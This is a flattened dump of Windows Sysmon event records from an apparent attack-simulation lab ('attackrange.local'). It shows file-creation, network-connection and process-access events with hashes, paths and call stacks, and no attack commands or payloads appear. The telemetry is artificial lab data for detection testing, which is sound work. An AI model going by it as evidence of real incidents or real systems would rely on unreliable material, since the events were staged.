Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB90A0AD49AA9DD89EE15718D2454D5F,SHA256=A37C93EA2FD8B3981B0512B2C7396BF149950404F4C77F50B138B5E1464E272F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:55.539{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-26559-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:56.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=006519A246BC837E1392E009E07301A4,SHA256=F75AA73DA53B66192CB62A470FFEC002D9A27431A72414BB05962D0B0D30EB8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.875{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCFCDCDB1C747ECD9F405EE255D7AE7,SHA256=91B37435A26DD06A5FD9910616004B54C7E173442E1205C4F637B96218233682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:57.519{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC63E2CAA0453FA5A4BB7A64FAC82F47,SHA256=F2FF8B3B68174CA0AC49BF880B80EA744590B1C83EA4C37EBA610919B3988603,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.594{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51177-false10.0.1.12-8000- 23542300x80000000000000001052925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E72F012E0CA3160D9228272ED5412270,SHA256=2D37EED0D3FB3E5E85727821727FFA0DA783038B5BC29EDD8255FAA001F9F4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=641CA7BEDD7DBADCBC09906EC4AAF8B8,SHA256=933DCE3AA0D3BF5525726F17A366B1D8E4250699EC67B6D0EA9D43623E09D910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A36009947184A90E0DF76BF148A3587C,SHA256=F0A507B4D18C7B4FD7645CEB96308A05E3DDE98C503230A868B4E0DACA88449B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EC8E1F52BCFBFC2D00390CCB59DE2B50,SHA256=2F037B65EB8CAFD51EBD81EB77D331D75DA569DBB310A49F403163EAB38F406F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=94A1CAF0A58B28E43700079C652F7586,SHA256=2979F53BB7DD05BE829CCFC4C66285922D5DF1AC0BDB95F2BC78D0F2ABB67C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1FE05AE45FE37151D3BDE8F098C8399C,SHA256=FD6938823F69BF74FC6770AD223CE1655163E76591C43A201E9CE79FBE15BDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=70A4D8CBD7C6E2EF49EB0CDD6E8935C4,SHA256=39D635C372A1A3A2F7DC5DA8A13FABDE3CD52E0AA65AF7BA060951CDC03B9FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=56EC6B9276ABF456CFEA8E0F531E6DDD,SHA256=CAD0FDE86DD21274CE834EB6636426AF6112D8FB0C9CA21266F6800154131F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FE61B8AA91B6910CA4F7326265B5D872,SHA256=42C19F2C60D665B27E1AB60D781114B57ECE55000A375842A71EEAD142767C10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5256E07F788FF97829C0D7C4A2588593,SHA256=FE02D6BADE22E34DE0E515A363A653EE002942274A86EF55B6367053174CFBF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C138FA0E19248613F235DD45FAA354BF,SHA256=B0DFC1027517D8973CCC306E66A784952BA45F6695D5CC40C9B2F1818F2F79C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.260{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:57.129{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:57.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBFB089F7FA3D5EA09BAC4C6149D5C7,SHA256=576192195BB6402DC06C9DDA0B76A8268A3506E6BD7F85616B1C17197A825640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:57.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E5C57C90D1425C1C830B7D59FE1710A,SHA256=602FCA836AF42DDBEE7BCCB97D8C50BB81F96252B9ADE4E42ABC5B13BF4D7DCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BEE26BDDAD632A25EBC5C73F145B98E,SHA256=2F1341890964D4DD07EDA8B1453C95F39854F0A1DE74C2B6BB64B0C5E227BD0B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:58.531{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F61F13476D9147472AC0AFC8463ED9,SHA256=B8280950BD86BF924CC1284DEE171D0101440A1C4CDBAE9A0FC18BB9E3953C82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.777{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51178-false10.0.1.12-8089- 23542300x80000000000000001052928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.228{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf7319bc.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:59.911{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3051B457A696BAADB06521CAC2376690,SHA256=39BE981729E5902B0F46579A3DE2FE512DB9FD23734DE1CFFA0068AE3D83C224,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:59.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD74B336AABB18A88B403587D74A3DB3,SHA256=A986B1F00AE5A9660D3F0084F19F6EAB48EDA953D63ECE2A87987F8D4144686D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.912{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4334917CBCBCB64838C6021077793A4F,SHA256=D02ED2B45F202D76A4A9E44805743C76609E5DB880708F8F8C3BCE359A775F98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:00.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39E8E4FCADF727A5FB3E80C22716F154,SHA256=F7F9C8780D4CC69D0FEF424D5711790D92E593C1DF5D3C5DA884C5EB704E2020,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001052933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001052932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf732361.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:01.928{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF7743FECF84389C810D00ECFC5E15F5,SHA256=847ED7C9FF277A58F4B306FCCEEFCD55FCDAD066751B33B0F76A039A079E0787,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:59.369{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57402-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:01.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311E2E31A0DF5B58D276045BF463EFE7,SHA256=0A8898649FE16B7CC13426F1E5CDD07FCEF32FD8056A86D93A91285A6F298579,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:02.958{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51EE5398D4717009F0F960CCBE6B4B4D,SHA256=1EC7F35952A5E1A0AB58808A4B96419725BF1EC8ED2B1726EDB354A56BFC1641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:02.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4E2BFDAA357AEB931461F295D86A29,SHA256=F31C21C58066E3D2A2A8301F6BA840C1B5FE64DA277C8BA27D2988E35BB3F5D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:02.612{466BC892-02B0-60E8-1600-00000000CF01}13046896C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:02.612{466BC892-02B0-60E8-1600-00000000CF01}13046896C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:03.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59DC036CC5A576E5D48A399C26DB2443,SHA256=B1DCC2891E650B230788D4DBF76DA7AFAB1C061E7F0484C30F21757E048514E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:03.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD16C8966DB23D62426CA0649BF8F15B,SHA256=F13DF95CC14123773E4D73BFCE11C8C6810B2E80BDA6B84AC419F78A71318D17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.760{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51179-false10.0.1.12-8000- 23542300x8000000000000000809509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:04.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 